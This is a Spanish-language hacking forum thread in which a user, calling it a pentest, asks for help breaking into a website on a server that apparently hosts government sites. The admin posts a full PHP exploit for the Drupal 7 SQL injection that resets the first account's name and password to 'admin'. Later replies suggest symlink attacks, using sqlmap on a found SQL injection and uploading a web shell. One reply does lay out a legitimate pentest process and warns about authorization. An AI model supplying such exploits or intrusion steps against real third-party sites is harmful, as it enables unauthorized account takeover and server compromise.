comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[SOLUCIONADO] Con Pentesting a una Web

  • 14 Respuestas
  • 2395 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« en: Junio 16, 2015, 09:12:32 pm »
Hola,

Quisiera saber, cómo vulnerar una página para un pentesting que se me ha pedido pero que no le encuentro el error, ya sea FPD,Sql injection, etc...
El servidor cuenta con varios dominios, pero los otros dominios son Drupal 7.
Les agradecería si me ayudaran, lo necesito lo más antes posible, y si le encuentran la vulenrabilidad les agradezco, sino, con sólo decirme que puedo hacer basta.


Gracias de nuevo.
« Última modificación: Junio 18, 2015, 06:50:46 am por blackdrake »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Junio 16, 2015, 09:33:38 pm »
Existe un exploit para esa versión

Código: PHP
  1. <?php
  2. /********************************************************
  3.  * Drupal 7 SQL Injection vulnerability demo
  4.  * Created by Milan Kragujevic (of milankragujevic.com)
  5.  * Read more at http://milankragujevic.com/post/66
  6.  * This will change the first user's username to admin
  7.  * and their password to admin
  8.  * Change $url to the website URL
  9.  ********************************************************/
  10. $url = '[URL HERE]'; // URL of the website (http://domain.com/)
  11. $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . No tienes permisos para ver links. Registrate o Entra con tu cuenta('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  12.  
  13. $params = No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  14.         'http' => No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  15.                 'method' => 'POST',
  16.                 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  17.                 'content' => $post_data
  18.         )
  19. );
  20. $ctx = No tienes permisos para ver links. Registrate o Entra con tu cuenta($params);
  21. $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta($url . '?q=node&destination=node', null, $ctx);
  22.  
  23. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  24.         echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
  25. } else {
  26.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
  27. }
  28.  

Espero que te sirva.

Saludos!
ANTRAX


Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #2 en: Junio 16, 2015, 09:37:14 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Existe un exploit para esa versión

Código: PHP
  1. <?php
  2. /********************************************************
  3.  * Drupal 7 SQL Injection vulnerability demo
  4.  * Created by Milan Kragujevic (of milankragujevic.com)
  5.  * Read more at http://milankragujevic.com/post/66
  6.  * This will change the first user's username to admin
  7.  * and their password to admin
  8.  * Change $url to the website URL
  9.  ********************************************************/
  10. $url = '[URL HERE]'; // URL of the website (http://domain.com/)
  11. $post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . No tienes permisos para ver links. Registrate o Entra con tu cuenta('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
  12.  
  13. $params = No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  14.         'http' => No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  15.                 'method' => 'POST',
  16.                 'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
  17.                 'content' => $post_data
  18.         )
  19. );
  20. $ctx = No tienes permisos para ver links. Registrate o Entra con tu cuenta($params);
  21. $data = No tienes permisos para ver links. Registrate o Entra con tu cuenta($url . '?q=node&destination=node', null, $ctx);
  22.  
  23. if(No tienes permisos para ver links. Registrate o Entra con tu cuenta($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
  24.         echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
  25. } else {
  26.         echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
  27. }
  28.  

Espero que te sirva.

Saludos!
ANTRAX

Hola Antrax,
Deberas, muchsa gracias por responder.
Pero ahora, ¿Si esa versión no es vulnerable? ¿Qué me recomiendas? ¿O ya la probaste tú?  :O
PD: Ahora que veo, ese exploit ya lo había intentado, pero no me funcionó,¿Será que lo ejecuté mal?.
En URL HERE puse el sitio sin los [], pero no funciono :O.


Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #3 en: Junio 16, 2015, 10:34:38 pm »
Podes intentar varias cosas.
Ver si esta en un host compartido e intentar symlink.
Ver que servicios y puertos tiene abierto el server para ver si alguno es vulnerable

Vulnerar un sitio no siempre depende del sitio en si.

Saludos!
ANTRAX


Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Junio 16, 2015, 11:03:09 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Podes intentar varias cosas.
Ver si esta en un host compartido e intentar symlink.
Ver que servicios y puertos tiene abierto el server para ver si alguno es vulnerable

Vulnerar un sitio no siempre depende del sitio en si.

Saludos!
ANTRAX

Entonces podría intentarlo, y si me surge una duda,¿Me ayudas?
:)

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #5 en: Junio 16, 2015, 11:14:30 pm »
Claro bro, para eso estamos. Solo posteala en el foro y te ayudaremos entre todos!

Saludos!
ANTRAX


Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Junio 16, 2015, 11:46:07 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Claro bro, para eso estamos. Solo posteala en el foro y te ayudaremos entre todos!

Saludos!
ANTRAX

Muchas gracias, entonces voy a intentarle, si deseas, pones como "solucionado" y ya cuando pruebe, pues coloco la duda en esta misma sección.
Saludos bro :).

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #7 en: Junio 17, 2015, 09:35:15 am »
Por lo visto andas disparanado balas sin tener una mira, antes de todo inicia el proceso del pentesting iniciando desde 0 es decir.

Registro de Dominio
Información de servicios. (Vulnerables no vulnerables)
Reverse IP (Si hubieran mas bichos por ahí trata de escalar)
Escaneo manual, identifica posibles variables de explotación o ataques.
Escaneo automático si tienes la posibilidad.
Arma una tabla de criticidad.
(Solo por nombrar algunos ;). )

OJO: "Si te han contratado" estas cometiendo un grave error! al compartir el enlace del sitio que estas haciendo la prueba, podria acarrearte algun problema por la privacidad que tu debes de tener no es soltar y lanzar a todos. Del mismo modo antes de lanzar algun exploit o cualquier cosa valida si en los TOS es posible realizar ello sin ninguna limitante, es decir si no tiene que tener conocimiento la contraparte, no vaya a ser una DoS que lanzes y el sitio necesite estar online 24x7.

Regards
Snifer

No seas un mono con Gillet !

No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Junio 17, 2015, 01:55:52 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Por lo visto andas disparanado balas sin tener una mira, antes de todo inicia el proceso del pentesting iniciando desde 0 es decir.

Registro de Dominio
Información de servicios. (Vulnerables no vulnerables)
Reverse IP (Si hubieran mas bichos por ahí trata de escalar)
Escaneo manual, identifica posibles variables de explotación o ataques.
Escaneo automático si tienes la posibilidad.
Arma una tabla de criticidad.
(Solo por nombrar algunos ;). )

OJO: "Si te han contratado" estas cometiendo un grave error! al compartir el enlace del sitio que estas haciendo la prueba, podria acarrearte algun problema por la privacidad que tu debes de tener no es soltar y lanzar a todos. Del mismo modo antes de lanzar algun exploit o cualquier cosa valida si en los TOS es posible realizar ello sin ninguna limitante, es decir si no tiene que tener conocimiento la contraparte, no vaya a ser una DoS que lanzes y el sitio necesite estar online 24x7.

Regards
Snifer

No seas un mono con Gillet !

Hola, gracias por tu comentario.
Compartí el sitio, para ver qué le podían hallar que no le hallara yo, pero bueno, además, de que le he hecho escaneo de puertos, y todos los tiene cerrados a excepción del puerto 80, claro, con el Nmap.

Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #9 en: Junio 17, 2015, 01:57:43 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Claro bro, para eso estamos. Solo posteala en el foro y te ayudaremos entre todos!

Saludos!
ANTRAX
Hola Antrax,
he escaneado los puertos de la web con Nmap y me muestra que todos están cerrados menos el puerto 80, que es el servicio de http.
¿Alguna otra idea?...Creí que me iba a lanzar más puertos abiertos, pero me muestra sólo el 80 abierto, aunque le haya hecho escaneo profundo y demás.


Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #10 en: Junio 17, 2015, 02:16:26 pm »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta ,  el sitio que intentas vulnerar ya fue defaceado el 11/14, de hecho sufrio un mass defacement el servidor entero con varias webs gubernamentales, eso se puede ver en los mirrors de No tienes permisos para ver links. Registrate o Entra con tu cuenta, así que muy probablemente tenga un gran BUG para acceder a todo.

Saludos!

Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #11 en: Junio 17, 2015, 02:25:52 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta ,  el sitio que intentas vulnerar ya fue defaceado el 11/14, de hecho sufrio un mass defacement el servidor entero con varias webs gubernamentales, eso se puede ver en los mirrors de No tienes permisos para ver links. Registrate o Entra con tu cuenta, así que muy probablemente tenga un gran BUG para acceder a todo.

Saludos!
Eso veo, acabo de encontrarle una Sql injection a uno de sus dominios(Que no es drupal, los demás si) pero no es el principal....Lo estoy inyectando haber que..
¿De casualidad no sabes qué vulnerabilidad tiene en sí? acabo de ver en Zone-h, y sí, lo han hackeado 2 personas, pero no sé con qué vulnerabilidad.
Te lo agradezco  ;D

Desconectado EPSILON

  • *
  • Underc0der
  • Mensajes: 364
  • Actividad:
    0%
  • Reputación 0
  • epsilon@crypt.am
    • Ver Perfil
  • Skype: epsilon.root1
« Respuesta #12 en: Junio 17, 2015, 02:49:39 pm »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta la verdad no e testeado el sitio pero si encontraste una SQLi explotala y trata de subir shell en ese dominio (directorio), ya que si pudieron hacer un mass defacement es porque el servidor es de kernel rooteable o el openbase_dir() esta OFF o tiene algún fallo en la config. de Apache que permite ver todo los directorios web.

Saludos!

Desconectado D00mR3D

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #13 en: Junio 17, 2015, 03:03:28 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta la verdad no e testeado el sitio pero si encontraste una SQLi explotala y trata de subir shell en ese dominio (directorio), ya que si pudieron hacer un mass defacement es porque el servidor es de kernel rooteable o el openbase_dir() esta OFF o tiene algún fallo en la config. de Apache que permite ver todo los directorios web.

Saludos!

Ya casi da los resultados la expltoación del sqlmap, voy a ver y te comento.
Gracias!  :D

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« Respuesta #14 en: Junio 18, 2015, 06:49:25 am »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta

Cierro tema pues está solucionado, además, no puedes compartir los datos que sacarás explotando ese sqli.

Si tienes otra duda, crea otro

Saludos



 

¿Te gustó el post? COMPARTILO!



[SOLUCIONADO] ¿Kali Linux o Kali Linux Ligth ?

Iniciado por worq

Respuestas: 2
Vistas: 7621
Último mensaje Noviembre 21, 2017, 12:28:54 pm
por Codig0Bit
[SOLUCIONADO] ¿Como publicar un software como software libre?

Iniciado por FuriosoJack

Respuestas: 2
Vistas: 1641
Último mensaje Mayo 23, 2017, 07:24:22 am
por HATI
[SOLUCIONADO] Multiuploader de imagenes con mysql, hosting de imagenes con mysql

Iniciado por graphixx

Respuestas: 4
Vistas: 2227
Último mensaje Marzo 26, 2013, 05:42:58 pm
por Xt3mP
[SOLUCIONADO] Linux Mint, errores, errores y mas errores...

Iniciado por n1sendev

Respuestas: 12
Vistas: 3001
Último mensaje Noviembre 22, 2017, 06:50:55 am
por RuidosoBSD
[SOLUCIONADO] Ayuda urgente con Virus "Virus.Win32Sality"

Iniciado por Napsters

Respuestas: 6
Vistas: 3477
Último mensaje Junio 11, 2012, 03:38:18 am
por Satyricon